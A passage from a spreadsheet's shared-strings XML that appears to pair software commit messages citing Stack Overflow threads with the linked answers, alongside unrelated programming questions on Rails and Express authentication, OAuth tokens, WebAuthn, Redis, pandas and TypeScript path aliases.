        console.error(&amp;quot;Error on executing Tick - &amp;quot; + err);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I believe this Tick program run properly in the background.
Because I can see &amp;quot;Tack&amp;quot; from the 'tick.txt' file.&lt;/p&gt;
&lt;p&gt;So, my problem is that,
When I execute Tick program by electron spawn(),
I can not see stdout from the Tick program in realtime,
even though it runs properly.&lt;/p&gt;
&lt;p&gt;Could you give me some advice for this problem?
Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C702</t>
  </si>
  <si>
    <t>Attempting to fix password failed problem.
https://stackoverflow.com/questions/54380863/password-authentication-failed-for-user-ebroot-elastic-beanstalk</t>
  </si>
  <si>
    <t>Changing password: &lt;%= ENV['RDS_PASSWORD'] %&gt; to password: "&lt;%= ENV['RDS_PASSWORD'] %&gt;"
fixes the problem. Can you please tell me why this is like this?</t>
  </si>
  <si>
    <t xml:space="preserve">I've been told Java is not the greatest pick to follow an MVC architecture. I believe I've seen some Java framework solutions to ease this roadbump. However, I a bit confused on why this is. More specifically, why Java's attempt at MVC is often mocked as a "wannabe" approach. I come from a ObjC background (w/ Cocoa of course) and would love to hear from the seasoned programmers about why MVC with Java is said to fall short.
Appreciate it!
</t>
  </si>
  <si>
    <t>C703</t>
  </si>
  <si>
    <t>Feat/require auth (#84)
* fix(auth): Require authenticated user to access all urls except some of them
See example : https://stackoverflow.com/a/12924759/3115796
* fix(auth): Remove previous authRequire
* fix(auth): Bypass auth for testing env</t>
  </si>
  <si>
    <t>I would add checkUser middleware to all my paths, except homepage.
app.get('/', routes.index);
app.get('/account', checkUser, routes.account);
or
app.all('*', checkUser);
function checkUser(req, res, next) {
  if ( req.path == '/') return next();
  //authenticate user
  next();
}
You could extend this to search for the req.path in an array of non-authenticated paths:
function checkUser(req, res, next) {
  const nonSecurePaths = ['/', '/about', '/contact'];
  if (nonSecurePaths.includes(req.path)) return next();
  //authenticate user
  next();
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;im creating a simple power apps to list/insert/modify table record in SQL database.&lt;/p&gt;
&lt;p&gt;one of my grid OnSelect is running this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;If(
    IsBlank(
        LookUp(
            tmpSearch,
            ID = ThisItem.ID
        )
    ),
    Collect(
        tmpSearch,
        Filter(ShowColumns('app1.Search',ID,Profile_id,Tag,GUID,Created_date,Updated_date), Profile_id = gal_Profile.Selected.ID)
    )
);
UpdateIf(
    tmpSearch,
    ID = ThisItem.ID,
    {
        Tag: txtInput.Value,
        Updated_date: Now()    
    }
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to declare this line as a variable, so i can reuse in other grid/button.
Otherwise anytime i change/remove/add new columns, i have to adjust all of them 1 by 1&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Filter(ShowColumns('app1.Search',ID,Profile_id,Tag,GUID,Created_date,Updated_date), Profile_id = gal_Profile.Selected.ID)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C704</t>
  </si>
  <si>
    <t>Authenticate user after protect_from_forgery
https://stackoverflow.com/questions/38331496/rails-5-actioncontrollerinvalidauthenticitytoken-error</t>
  </si>
  <si>
    <t>Note: While this answer has the desired effect, it does so by reducing overall security. The below answer by Alon is more correct and maintains the security of the site.
class BugsController &lt; ApplicationController
skip_before_filter :verify_authenticity_token
protect_from_forgery prepend: true, with: :exception
before_action :authenticate_user!
before_action :set_bug, only: [:show, :edit, :update]
end
Like This</t>
  </si>
  <si>
    <t xml:space="preserve">I've came accross this concept several times and did not find a clear explanation.
What is it? What has it to do with programming? What has it to do with what we (software engineeers / programmers) call architecture?
How can it help me? How can I put this to work for me? How is the professional that best understand this subject called?
</t>
  </si>
  <si>
    <t>C705</t>
  </si>
  <si>
    <t>(seemingly) working sign-out (see https://stackoverflow.com/questions/41122053/httpcontext-authentication-signoutasync-does-not-delete-auth-cookie)</t>
  </si>
  <si>
    <t>You didn't post enough code to tell, but I suspect after you call SignOutAsync you have some type of redirect (for example, RedirectToAction) which overwrites the redirect to the OIDC endsession URL that SignOutAsync tries to issue.
(The same explanation for the redirect overwrite problem is given here by Microsoft's HaoK.)
Edit: If my speculation above is correct, the solution is to send a redirect URL in an AuthenticationProperties object with the final SignOutAsync:
csharp
// in some controller/handler, notice the "bare" Task return value
public async Task LogoutAction()
{
    // SomeOtherPage is where we redirect to after signout
    await MyCustomSignOut("/SomeOtherPage");
}
// probably in some utility service
public async Task MyCustomSignOut(string redirectUri)
{
    // inject the HttpContextAccessor to get "context"
    await context.SignOutAsync("Cookies");
    var prop = new AuthenticationProperties()
    {
        RedirectUri = redirectUri
    };
    // after signout this will redirect to your provided target
    await context.SignOutAsync("oidc", prop);
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;Build mode............. spa
Pkg quasar............. v2.17.7
Pkg @quasar/app-vite... v2.0.8
Pkg vite............... v6.0.11
Debugging.............. no
Publishing............. no
Browser target......... es2022|firefox115|chrome115|safari14
=======================
Output folder.......... /usr/dist/spa
Tip: Built files are meant to be served over an HTTP server
      Opening index.html over file:// won't work
Tip: You can use &amp;quot;$ quasar serve&amp;quot; command to create a web server,
      both for testing or production. Type &amp;quot;$ quasar serve -h&amp;quot; for
      parameters. Also, an npm script (usually named &amp;quot;start&amp;quot;) can
      be added for deployment environments.
      If you're using Vue Router &amp;quot;history&amp;quot; mode, don't forget to
      specify the &amp;quot;--history&amp;quot; parameter: &amp;quot;$ quasar serve --history&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Helm chart has the values set to hit a domain but for context &lt;code&gt;package.json&lt;/code&gt; has npm run build:dev: development quasar build&lt;/p&gt;
&lt;p&gt;And production pod runs npm run build:prod from dockerFile. Now we want to run these 2 commands to work with current domains which we have set in aks. But this is the error we get above. It's like it doesn't know what domain to go to even though we have the correct &lt;code&gt;configmap.yml&lt;/code&gt; and &lt;code&gt;values.yml&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C706</t>
  </si>
  <si>
    <t>Problem with oAuth access token: http://stackoverflow.com/questions/34572108/error-only-valid-bearer-authentication-supported-when-requesting-access-token</t>
  </si>
  <si>
    <t>It was the wrong endpoint: it should be accounts.spotify.com not api.spotify.com
Then I got a status 500 &amp; I also fixed this:
function getToken(code){
    var idAndSecret = config.clientId+':'+config.clientSecret;
    var authString = 'Basic ' + new Buffer(idAndSecret).toString('base64');
    var data = querystring.stringify({
        grant_type: "authorization_code",
        code: code,
        redirect_uri: REDIRECT_URI
    });
    var tokenReq = https.request({
        hostname: 'accounts.spotify.com',
        path: '/api/token',
        method: 'POST',
        headers: {
            'Authorization': authString,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': Buffer.byteLength(data)
        }
    }, function(res){
        res.on('data', function(chunk){
            console.log(new Buffer(chunk).toString());
        });
        console.log(res.statusCode, JSON.stringify(res.headers));
    });
    tokenReq.end(data);
}</t>
  </si>
  <si>
    <t xml:space="preserve">Scenario: A WCF service receives an XDocument from clients, processes it and inserts a row in an MS SQL Table.
Multiple clients could be calling the WCF service simultaneously. The call usually doesn't take long (a few secs). 
Now I need something to poll the SQL Table and run another set of processes in an asynchronous way. 
The 2nd process doesn't have to callback anything nor is related to the WCF in any way. It just needs to read the table and perform a series of methods and maybe a Web Service call (if there are records of course), but that's all. 
The WCF service clients consuming the above mentioned service have no idea of this and don't care about it.
I've read about [external-link] and I also know that a Windows Service would be ideal, but this WCF Service will be hosted on a Shared Hosting (discountasp or similar) and therefore, installing a Windows Service will not be an option (as far as I know). 
Given that the architecture is fixed (I.E.: I cannot change the table, it comes from a legacy format, nor change the mechanism of the WCF Service), what would be your suggestion to poll/process this table?
I'd say I need it to check every 10 minutes or so. It doesn't need to be instant. 
Thanks.
</t>
  </si>
  <si>
    <t>C707</t>
  </si>
  <si>
    <t>Updated pipeline example to include externalized auth;
See http://stackoverflow.com/questions/20504515/associate-only-authentication-with-python-social-authentication-and-django</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a sports carnival application to remove the need for complex excel workbooks, as the new person in charge of these events has little excel skills.&lt;/p&gt;
&lt;p&gt;While I can add a result record for a heat into the DB that is not an issue, I need to be able to lookup and allocate points based on their time.&lt;/p&gt;
&lt;p&gt;The database would look as such:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Result Table
|ID|Name|Squadron_id|event|competition_id|heat|time|heat_position|overall_position|points|
Points table
|ID|position|points_allocated|
 1      1st         10
 2      2nd         8
 3      3rd         6
 4      4th         4
 5      5th         2
 6      6th         1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I have no idea on how to approach is how to allocate the overall position and the points in the result table.
These will need to be updated as additional results come in for that event.&lt;/p&gt;
&lt;p&gt;Also, is there a way which I can add multiple records versus one at a time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C708</t>
  </si>
  <si>
    <t>Updated GoogleReader authorization method.
Patch by suggestion of lovelovelamb.
See also
http://stackoverflow.com/questions/3100078/google-reader-authentication-problem</t>
  </si>
  <si>
    <t>I did it. Yes, the link provided by sfa is right. But the format is sort of too confusing. Here's how I do it.
Post to https://www.google.com/accounts/ClientLogin with login credentials.
In return, three tokens will be passed if correct login: a. SID b. LSID c. Auth
Save the Auth somewhere in application. Forget about SID and LSID (I guess they might remove them later on)
In every request, add following in the header: headername: Authorization value: GoogleLogin auth={Auth string} e.g. (in java)
HttpGet method = new HttpGet(CommandUrl + QueryString); method.addHeader("Authorization", "GoogleLogin auth=" + Auth);
This works. Thanks sfa for the link.</t>
  </si>
  <si>
    <t xml:space="preserve">My company is currently in the process of creating a large multi-tier software package in C#. We have taken a SOA approach to the structure and I was wondering whether anyone has any advice as to how to make it extensible by users with programming knowledge.
This would involve a two-fold process: approval by the administrator of a production system to allow a specific plugin to be used, and also the actual plugin architecture itself.
We want to allow the users to write scripts to perform common tasks, modify the layout of the user interface (written in WPF) and add new functionality (ie. allowing charting of tabulated data). Does anyone have any suggestions of how to implement this, or know where one might obtain the knowledge to do this kind of thing?
I was thinking this would be the perfect corner-case for releasing the software open-source with a restrictive license on distribution, however, I'm not keen on allowing the competition access to our source code.
Thanks.
EDIT: Thought I'd just clarify to explain why I chose the answer I did. I was referring to production administrators external to my company (ie. the client), and giving them someway to automate/script things in an easier manner without requiring them to have a full knowledge of c# (they are mostly end-users with limited programming experience) - I was thinking more of a DSL. This may be an out of reach goal and the Managed Extensibility Framework seems to offer the best compromise so far.
</t>
  </si>
  <si>
    <t>C709</t>
  </si>
  <si>
    <t>Finally(!) fixed the problem with SRDA authentication and data query 
form submission (for details, see http://stackoverflow.com/questions/22316469/debugging-rcurl-based-authentication-form-submission).</t>
  </si>
  <si>
    <t>I've simplified the code still further:
library(httr)
base_url  &lt;- "http://srda.cse.nd.edu"
loginURL &lt;- modify_url(
  base_url, 
  path = "mediawiki/index.php", 
  query = list(
    title = "Special:Userlogin", 
    action = "submitlogin",
    type = "login",
    wpName1 = USER,
    wpPasswor1 = PASS
  )
)
r &lt;- POST(loginURL)
stop_for_status(r)
queryURL &lt;- modify_url(base_url, path = "cgi-bin/form.pl")
query &lt;- list(
  uitems       = "user_name",
  utables      = "sf1104.users a, sf1104.artifact b",
  uwhere       = "a.user_id = b.submitted_by AND b.artifact_id = 304727",
  useparator   = ":",
  append_query = "1"
)
r &lt;- POST(queryURL, body = query, multipart = FALSE)
stop_for_status(r)
But I'm still getting a 500. I tried:
setting extra cookies that I see in the browser (wiki_dbUserID, wiki_dbUserName)
setting header DNT to 1
setting referer to
http://srda.cse.nd.edu/cgi-bin/form.pl
setting user-agent the same as chrome
setting accept "text/html"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Getting this error after upgrade Angular Version 14 to 18.
Till version 16 application working fine but in Version 18 it showing error.&lt;/p&gt;
&lt;p&gt;It showing error on main.ts file 69 line.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;ERROR : NG0203: &lt;code&gt;inject()&lt;/code&gt; must be called from an injection context
such as a constructor, a factory function, a field initializer, or a
function used with &lt;code&gt;runInInjectionContext&lt;/code&gt;. Find more at
&lt;a href="https://angular.dev/errors/NG0203" rel="nofollow noreferrer"&gt;https://angular.dev/errors/NG0203&lt;/a&gt;
&lt;a href="https://i.sstatic.net/eA5kbVCv.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/eA5kbVCv.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;main.ts
&lt;a href="https://i.sstatic.net/64ewgcBM.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/64ewgcBM.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Note:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I am not using &lt;code&gt;inject()&lt;/code&gt; in my project.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;@Inject()&lt;/code&gt; using in project.&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>C71</t>
  </si>
  <si>
    <t>[4.2]@EnvironmentObject &amp; Map Pins
Review @EnvironmenObject, create out LocationManager and get map pins showing.
SwiftUI's App Protocol Documentation:
https://developer.apple.com/documentation/swiftui/app
Managing App in SwiftUI:
https://swiftwithmajid.com/2020/08/19/managing-app-in-swiftui/
StackOverflow answer about EnvironmentObject &amp; ViewModel
https://stackoverflow.com/questions/59491675/swiftui-how-to-pass-environmentobject-into-view-model</t>
  </si>
  <si>
    <t>You can do it like this:
struct YourView: View {
  @EnvironmentObject var settings: UserSettings
  @ObservedObject var viewModel: YourViewModel
  var body: some View {
    VStack {
      Text("Hello")
    }
    .onAppear {
      self.viewModel.setup(self.settings)
    }
  }
}
For the ViewModel:
class YourViewModel: ObservableObject {
  var settings: UserSettings?
  func setup(_ settings: UserSettings) {  
    self.settings = settings
  }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have pandas table where I want to create new column and fill data based on another columns values. I also want to know, if new columns value is updated
So I have dictionary like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;update_values = {&amp;quot;Groub_A&amp;quot;: {&amp;quot;aadff2&amp;quot;: &amp;quot;Mark&amp;quot;, &amp;quot;aasd12&amp;quot;: &amp;quot;Otto&amp;quot;, &amp;quot;asdd2&amp;quot;: &amp;quot;Jhon&amp;quot;},&amp;quot;Groub_B&amp;quot;: {&amp;quot;aadfaa&amp;quot;: &amp;quot;Josh&amp;quot;, &amp;quot;aa1113&amp;quot;: &amp;quot;Math&amp;quot;, &amp;quot;967323sd&amp;quot;: &amp;quot;Marek&amp;quot;}}  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I want to my table look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Column_1 | Column_new_2 | Column_new_3
aadff2   | Mark         | Groub_A
aadff2   | Mark         | Groub_A
aasd12   | Otto         | Groub_A
asdd2    | Jhon         | Groub_A
967323sd | Marek        | Groub_B
967323sd | Marek        | Groub_B
aa1113   | Math         | Groub_B
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So far I have just copied Column_1 and use &lt;code&gt;df.replace(&amp;quot;Column_new_2&amp;quot;:update_values[&amp;quot;Groub_A&amp;quot;])&lt;/code&gt; and same thing with groub_B, but then don't know how to make Column_new_3?
There must be a easy solution, but I just can't figure it out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C710</t>
  </si>
  <si>
    <t>Send WWW-Authenticate on auth failure
https://stackoverflow.com/a/32695940/4252948</t>
  </si>
  <si>
    <t>But it is also possible to embed the credentials in the URL
Only if the browser is buggy in its support of HTTP, often deliberately so to be backwards compatible with browsers where people mistakenly thought this was a good idea.
It's never been allowed by the HTTP scheme, though the URI syntax more generally does allow user information there.
Is it something that is interpreted by the browser and converted into a Authorization header.
Yes. If the server at sent a 401 the browser would reply using that username and password. There has been at least one that used to pre-emptively attempt Basic which was obviously a bad idea on top of the existing bad idea.</t>
  </si>
  <si>
    <t xml:space="preserve">In the Northwind Starters Kit, Primary keys from database are mapped to Strings in C#.
Is this good practice? And if so, why?
thx, Lieven Cardoen
ps: Sorry for the maybe wrong question... 
In Northwind Starters Kit some tables have a auto-incremental primary key with datatype int and others have a non auto-incremental primary key with datatype nchar(5). Why is this? Well, apparently some primary keys are just codes (nchar(5) format). So sorry to have used your time.
I thought that a datatype int was mapped to C# string which seemed very wrong to me (but it isn't the case).
</t>
  </si>
  <si>
    <t>C711</t>
  </si>
  <si>
    <t>Support registering a new authenticator
This adds Yubico's FIDO2 library and two APIs for working with the
"navigator.credentials.create()" function in JavaScript. The GET
API uses the library to generate options for the "create()" function,
and the POST API decodes and verifies the resulting credential. While
the options and response are dict-like, CBOR is necessary to encode
some of the byte-level values, which can't be represented in JSON.
Much of the code here is based on the Yubico library example [1][2].
Implementation notes:
- There are definitely better ways to alert the user about failure, but
window.alert() will do for the time being. Using location.reload() is
also a bit jarring if the page scrolls, but not a major issue.
- Ideally we would use window.fetch() to do AJAX calls, but we don't
have a polyfill for this, and we use $.ajax() elsewhere [3]. We need
to do a few weird tricks [6] to stop jQuery trashing the data.
- The FIDO2 server doesn't serve web requests; it's just a "server" in
the sense of WebAuthn terminology. It lives in its own module, since it
needs to be initialised with the app / config.
- $.ajax returns a promise-like object. Although we've used ".fail()"
elsewhere [3], I couldn't find a stub object that supports it, so I've
gone for ".catch()", and used a Promise stub object in tests.
- WebAuthn only works over HTTPS, but there's an exception for "localhost"
[4].  However, the library is a bit too strict [5], so we have to disable
origin verification to avoid needing HTTPS for dev work.
[1]: https://github.com/Yubico/python-fido2/blob/c42d9628a4f33d20c4401096fa8d3fc466d5b77f/examples/server/server.py
[2]: https://github.com/Yubico/python-fido2/blob/c42d9628a4f33d20c4401096fa8d3fc466d5b77f/examples/server/static/register.html
[3]: https://github.com/alphagov/notifications-admin/blob/91453d36395b7a0cf2998dfb8a5f52cc9e96640f/app/assets/javascripts/updateContent.js#L33
[4]: https://stackoverflow.com/questions/55971593/navigator-credentials-is-null-on-local-server
[5]: https://github.com/Yubico/python-fido2/blob/c42d9628a4f33d20c4401096fa8d3fc466d5b77f/fido2/rpid.py#L69
[6]: https://stackoverflow.com/questions/12394622/does-jquery-ajax-or-load-allow-for-responsetype-arraybuffer</t>
  </si>
  <si>
    <t>WebAuthn javascript will work only when used with HTTPS or on the localhost hostname (in this case HTTPS is not required).
It seems that you are using an IP address</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Below is my redis &lt;code&gt;memory info&lt;/code&gt;, these days i have observed that redis is taking more time in sending response back. Looks like latency has increased.
Need suggestion if anything you see is not good based on memory info and can be corrected to decrease response time.&lt;/p&gt;
&lt;p&gt;I have hash with around 200K keys and values like &lt;code&gt;virt,GGUGUYGYUGYJFF600AEE4AJHJHDD,ssd,uttj,HBHJDBJHDBBFF877779799,JHIJJJIOJ00AEE4AIUHIHID&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;10.32.10.112:6379&amp;gt; info memory
# Memory
used_memory:35113416
used_memory_human:33.49M
used_memory_rss:43671552
used_memory_rss_human:41.65M
used_memory_peak:52099136
used_memory_peak_human:49.69M
used_memory_peak_perc:67.40%
used_memory_overhead:11478317
used_memory_startup:9234208
used_memory_dataset:23635099
used_memory_dataset_perc:91.33%
allocator_allocated:35388888
allocator_active:37056512
allocator_resident:42283008
total_system_memory:67260600320
total_system_memory_human:62.64G
used_memory_lua:37888
used_memory_lua_human:37.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:34359738368
maxmemory_human:32.00G
maxmemory_policy:noeviction
allocator_frag_ratio:1.05
allocator_frag_bytes:1667624
allocator_rss_ratio:1.14
allocator_rss_bytes:5226496
rss_overhead_ratio:1.03
rss_overhead_bytes:1388544
mem_fragmentation_ratio:1.25
mem_fragmentation_bytes:8722016
mem_not_counted_for_evict:0
mem_replication_backlog:1048576
mem_clients_slaves:17186
mem_clients_normal:859459
mem_aof_buffer:0
mem_allocator:jemalloc-5.1.0
active_defrag_running:0
lazyfree_pending_objects:0
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C712</t>
  </si>
  <si>
    <t>ZfcUser requires length=128 for the password column to support default ZfcUser password hashing strategy (changed DB columns as well)
 - Added a `SharedListenerAggregateInterface` to take care of all events related to LegacyRS and attached it in the Module's `onBootstrap()`.
 - Used the SharedManager to add events.  Events were working using the pattern suggested at http://stackoverflow.com/questions/24161764/catching-the-login-event-of-zfcuser-with-zend-framework-2, but this approach disguises the use of the `SharedManager` which seems to be a poor pattern.
 - Login handler needed to use `authenticate.success` because the standard `authenticate` provides username and password not the user who was logged in.  This event is found at 'ZfcUser\Authentication\Adapter\AdapterChain'.
 - The login code also introduced complexity because the database was not available in the event handler.  Instead, only the cookie was put in place.
 - The `user` cookie is finally committed to the database in `indexAction()`.  This should also be faster (avoiding db writes if legacy pages are not used).  Note that we must `flush()` to ensure that it's available.
 - `register` was simpler and the `register` event is found at 'ZfcUser\Service\User'
 - To secure all pages, `MvcEvent::EVENT_DISPATCH` was attached to 'Le</t>
  </si>
  <si>
    <t xml:space="preserve"> /**
 * Listen to the bootstrap event
 *
 * @return array
 */
public function onBootstrap(MvcEvent $e)
{
   $serviceManager = $e-&gt;getApplication()-&gt;getServiceManager()
   $loginFunction = function ($e) use ($serviceManager) { 
        // do something
   };
   $sharedManager-&gt;attach('ZfcUser\Service\User', 'login.post', $loginFunction);
}
Your code does not show what $zfcServiceEvents is or where it came from I assume it is a event manager referencing the zfcuser events. My approach is a little different since I attach a event to the zf2 shared manager. Maybe you have problems regarding that piece of code?
You can grab the sharedEventManager like so:
$sharedManager = $e-&gt;getApplication()-&gt;getEventManager()-&gt;getSharedManager();
EDIT: I was a little unclear on how to get the $serviceManager and the application within the Module.php onBootstrap function.</t>
  </si>
  <si>
    <t xml:space="preserve">(Updated: I've moved this over to [external-link])
I'm responsible for maintaining a list of all the applications in my company (about 250). The range is from HR systems that track 80k employees, to manufacturing-type systems responsible for hundreds of millions of dollars of revenue, to web applications with a small user base and not a lot of risk associated to them going down.
The technologies are mostly split between SAP, .Net, and Java, but we have legacy examples of just about everything else you can imagine. 
The point of the list is to be able to manage risk and identify opportunities for improvement. For instance, when we find systems that are responsible for core business functionality that are written in clipper, we try to find some money to re-write them. We call the picture of the high-risk apps in the landscape the "heat map".
The list is pretty simple - It really just needs the name, description, ID, DB platform, App platform (ex, SAP, .Net, Java on Weblogic, Mainframe, etc), key interfaces, and key services. 
Anyone have any experience building / maintaining a list like this? What should I keep in mind?
Cheers
KA
</t>
  </si>
  <si>
    <t>C713</t>
  </si>
  <si>
    <t>Update OAuthConstants.java
As far as I can tell bearer token should be written with uppercase B, ie:
 - https://tools.ietf.org/html/rfc6750#section-2.1
 - http://stackoverflow.com/questions/22229996/basic-http-and-bearer-token-authentication
I'm not very fluent with RFC docs so I'm not sure how "bearer" should be treated. Currently the problem occurs in OAuth20ProfileController.handleRequestInternal() (line 71), this can be fixed by making authHeader lowercase before comparision, but that would allow usage of constructs like "bEarer" etc. which doesn't seem right</t>
  </si>
  <si>
    <t>Try this one to push basic authentication at url:
curl -i http://username:
[email protected]
/api/users -H "Authorization: Bearer mytoken123"
               ^^^^^^^^^^^^^^^^^^
If above one doesn't work, then you have nothing to do with it. So try the following alternates.
You can pass the token under another name. Because you are handling the authorization from your Application. So you can easily use this flexibility for this special purpose.
curl -i http://dev.myapp.com/api/users \
  -H "Authorization: Basic Ym9zY236Ym9zY28=" \
  -H "Application-Authorization: mytoken123"
Notice I have changed the header into
Application-Authorization
. So from your application catch the token under that header and process what you need to do.
Another thing you can do is, to pass the
token
through the
POST
parameters and grab the parameter's value from the Server side. For example passing token with curl post parameter:
-d "auth-token=mytoken123"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to calculate total impressions for each campaign to get the
expected output of a table with &lt;code&gt;campaign_id&lt;/code&gt; and total impressions.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT 
    &amp;quot;Campaign_ID&amp;quot;, 
    SUM(&amp;quot;Impressions&amp;quot;) AS Total_Impressions
FROM 
    campaigndata1
GROUP BY 
    &amp;quot;Campaign_ID&amp;quot;;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C714</t>
  </si>
  <si>
    <t xml:space="preserve">Introduce max Request Time in the Backend to reduce Keeping the performance overhead
 just came up with a potential improvement. We have a timeout parameter in the js file. How about adding a timeout to each request in java?
The timeout could be configureable.
Seems to be true :(. I also created a StackExchange Thread some weeks ago. http://stackoverflow.com/questions/36642801/embeded-jetty-kill-request-after-a-given-time
The only answer is about writing it myself using Future. </t>
  </si>
  <si>
    <t>Do you access to the code that kicks of the code which takes too long to complete? If so you can use callable and an Executor to achieve this yourself, below is a unit test with an example:
@Test
public void timerTest() throws Exception
{
  //create an executor
  ExecutorService executor = Executors.newFixedThreadPool(10);
  //some code to run
  Callable callable = () -&gt; {
    Thread.sleep(10000); //sleep for 10 seconds
    return 123;
  };
  //run the callable code
  Future&lt;Integer&gt; future = (Future&lt;Integer&gt;) executor.submit(callable);
  Integer value = future.get(5000, TimeUnit.MILLISECONDS); //this will timeout after 5 seconds
  //kill the thread
  future.cancel(true);
}</t>
  </si>
  <si>
    <t xml:space="preserve">Coming from a desktop client background, with no real data-driven web design experience, I am studying ASP.NET UI design to determine the best UI pattern for Parent/Children data.
I always tend to experiment with Parent/Child presentation when learning a new UI platform, so that is where I have started here. Thinking I should use ASP.NET 2.0, I am studying the various ways of architecting a UI form which contains a master list of Parent records, and then showing the related children records in a second grid on the page when you click on a parent. Eventually, even the child records are parents to other children, so I'll need to deal with that also.
Think: Customers with Open Orders / Open Orders for Selected Customer / Line Items on Selected Open Order... like this screen where I built the same thing in WPF: [external-link]
Some of techniques I've seen simply creates a plain old-shcool table of href links for the parents, with some method call to query the children based on the selected parent, while some techniques I've seen use the ASP.NET 2.0 data controls to work all this out. Are the ASP.NET 2.0 data controls cheating? Do real developers use these out-of-the box controls, or do they output their own HTML so they can have more control?
Also, it seems like ASP.NET MVC is all the rage right now, so I though I should consider that. When I looked at a few intro's about it, it seems to take a step back in time as it looks like you have to manually create much the HTML to present lists and datagrids, rather than being able to use the ASP.NET 2.0 controls.
I'm kinda lost as to where to spend my energy.
</t>
  </si>
  <si>
    <t>C715</t>
  </si>
  <si>
    <t>Exclude xml-apis dependency from batik components
We decided to always exclude this artifact from
dependencies managed by the SciJava Bill of Materials.
For some relevant discussion, see:
http://stackoverflow.com/q/11677572</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;Issue with Path Alias Resolution in TypeScript&lt;/h2&gt;
&lt;p&gt;I am encountering an issue when using path aliases in TypeScript.&lt;/p&gt;
&lt;p&gt;When I import a module without explicitly including &lt;code&gt;/index&lt;/code&gt;, such as:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import { Colors } from &amp;quot;@utils&amp;quot;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import { Colors } from &amp;quot;@utils/&amp;quot;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I receive the error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Cannot find module '@utils' or its corresponding type declarations.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, if I add &lt;code&gt;/index&lt;/code&gt; explicitly, the import works fine:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import { Colors } from &amp;quot;@utils/index&amp;quot;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Strangely, when I don't want to add &lt;code&gt;/index&lt;/code&gt; explicitly, I have to navigate into a folder and then back out with &lt;code&gt;/..&lt;/code&gt; for the &lt;code&gt;index&lt;/code&gt; file to be detected, and everything works fine.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import { Colors } from &amp;quot;@utils/folder-example/..&amp;quot;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems like you have to at least navigate into one folder first, like adding &lt;code&gt;@utils/folder-example/..&lt;/code&gt; for the index to be detected. But when using just &lt;code&gt;@utils&lt;/code&gt; or &lt;code&gt;@utils/&lt;/code&gt;, the index file won't be detected.
This issue occurs with all the path aliases I have configured.&lt;/p&gt;
&lt;p&gt;I have configured the path alias in my &lt;code&gt;tsconfig.json&lt;/code&gt; as follows:&lt;/p&gt;
&lt;pre class="lang-json prettyprint-override"&gt;&lt;code&gt;{
  &amp;quot;extends&amp;quot;: &amp;quot;expo/tsconfig.base&amp;quot;,
  &amp;quot;compilerOptions&amp;quot;: {
    &amp;quot;allowSyntheticDefaultImports&amp;quot;: true,
    &amp;quot;module&amp;quot;: &amp;quot;CommonJS&amp;quot;,
    &amp;quot;moduleDetection&amp;quot;: &amp;quot;force&amp;quot;,
    &amp;quot;moduleResolution&amp;quot;: &amp;quot;node&amp;quot;,
    &amp;quot;strict&amp;quot;: true,
    &amp;quot;baseUrl&amp;quot;: &amp;quot;./&amp;quot;,
    &amp;quot;paths&amp;quot;: {
      &amp;quot;@utils/*&amp;quot;: [
        &amp;quot;./src/utils/*&amp;quot;
      ]
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Questions:&lt;/h3&gt;
&lt;ul&gt;
